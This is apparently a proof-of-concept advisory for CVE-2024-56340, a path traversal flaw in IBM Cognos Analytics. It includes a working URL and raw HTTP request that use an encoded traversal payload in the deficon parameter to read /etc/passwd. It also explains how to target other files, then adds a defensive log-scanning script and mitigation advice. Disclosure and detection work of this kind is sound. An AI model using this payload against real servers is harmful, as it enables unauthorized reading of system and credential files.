
CVE-2024-56340 PoC — IBM Cognos Analytics path traversal

Associated Vulnerability
Title: IBM Cognos Analytics path traversal (CVE-2024-56340)
Description: IBM Cognos Analytics 11.2.0 through 11.2.4 FP5 is vulnerable to a local file inclusion vulnerability, allowing an attacker to access sensitive files by inserting path traversal payloads inside the deficon parameter.
Description
IBM Cognos Analytics Path Traversal, PoC of CVE-2024-56340
Readme
# CVE-2024-56340

**Severity :** **Medium** (**6.5**)

**CVSS score :** `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N`

## Summary :
**IBM Cognos Analytics 11.2.0** through **11.2.4 FP5** could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system.
## PoC
After logging into IBM Cognos Analytics, if the user has the permissions needed to reach the URL below, it is possible to read files stored server-side using path traversal payloads; in this case Unix-style payloads have been used to read /etc/passwd.
### Steps to Reproduce :
1. Login into the app.
2. Open this URL, replacing `<domain>` with the vulnerable **domain**, to read /etc/passwd; or replace `%2fetc%2fpasswd` with the path of the file to read, with each `/` URL-encoded as `%2f`:
```
https://<domain>/ibmcognos/bi/v1/disp/icd/feeds/cm/system/rds/thumbnail/?waitThreshold=0&deficon=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&v=3
```
Full request:
```
GET /ibmcognos/bi/v1/disp/icd/feeds/cm/system/rds/thumbnail/?waitThreshold=0&deficon=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&v=3 HTTP/1.1
Host: <host>
Cookie: <cookie> 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
```
NOTE: Other files can be read by substituting the URL-encoded path of the target file for `%2fetc%2fpasswd`.
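
As an added defender-side example (not part of the original PoC or of IBM's code): a small Python script that scans constructed access-log lines for traversal payloads in the `deficon` parameter of the thumbnail endpoint, decoding double-encoded sequences, together with the base-directory confinement check that prevents this class of read. The log lines, IPs, usernames and the `/opt/cognos/icons` base directory are assumed sample values.

```python
"""Scan access-log lines for CVE-2024-56340-style traversal in the Cognos
thumbnail endpoint's deficon parameter (added example, not the PoC's code)."""
import os
import re
from urllib.parse import parse_qs, unquote, urlsplit

THUMBNAIL_PATH = "/ibmcognos/bi/v1/disp/icd/feeds/cm/system/rds/thumbnail/"
# Constructed sample log lines (common log format); not from a real server.
SAMPLE_LOG = """\
10.0.0.5 - alice [10/Jan/2025:10:00:01 +0000] "GET /ibmcognos/bi/v1/disp/icd/feeds/cm/system/rds/thumbnail/?waitThreshold=0&deficon=..%2f..%2f..%2f..%2fetc%2fpasswd&v=3 HTTP/1.1" 200 1407
10.0.0.6 - bob [10/Jan/2025:10:00:02 +0000] "GET /ibmcognos/bi/v1/disp/icd/feeds/cm/system/rds/thumbnail/?waitThreshold=0&deficon=report_icon.png&v=3 HTTP/1.1" 200 512
10.0.0.7 - carol [10/Jan/2025:10:00:03 +0000] "GET /ibmcognos/bi/v1/disp/icd/feeds/cm/system/rds/thumbnail/?deficon=%252e%252e%252f%252e%252e%252fetc%252fshadow HTTP/1.1" 403 0
10.0.0.8 - dave [10/Jan/2025:10:00:04 +0000] "GET /ibmcognos/bi/v1/disp/other/?deficon=..%2f..%2fx HTTP/1.1" 404 0
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) ')
# A ".." path segment with either slash style, at the start, middle or end.
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded %252e%252e%252f is caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_traversal_requests(log_text):
    """Return (ip, user, decoded deficon) for thumbnail requests carrying '..'."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand
        parts = urlsplit(m.group("target"))
        if parts.path != THUMBNAIL_PATH:
            continue  # only the vulnerable endpoint is in scope here
        for raw in parse_qs(parts.query).get("deficon", []):  # parse_qs decodes once
            decoded = fully_decode(raw)
            if TRAVERSAL_RE.search(decoded):
                hits.append((m.group("ip"), m.group("user"), decoded))
    return hits

def is_inside_base(base_dir, user_path):
    """Server-side confinement check that blocks this class of bug: resolve
    the requested name under the (assumed) icon directory and refuse escapes."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_path))
    return os.path.commonpath([base, target]) == base
```

The single-decode request (alice) and the double-encoded one (carol) are both flagged, while the benign icon name and the request to a different endpoint are not.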

## Affected Version Details :

 - 11.2.0 $\le$ version $\le$ 11.2.4

## Impact :

The attacker can read files stored server-side on the machine where the tool has been installed. This can be a vector for RCE if certain conditions hold on the victim machine.
## Mitigation :

- Update to version > 11.2.4

## References :
- https://nvd.nist.gov/vuln/detail/CVE-2024-56340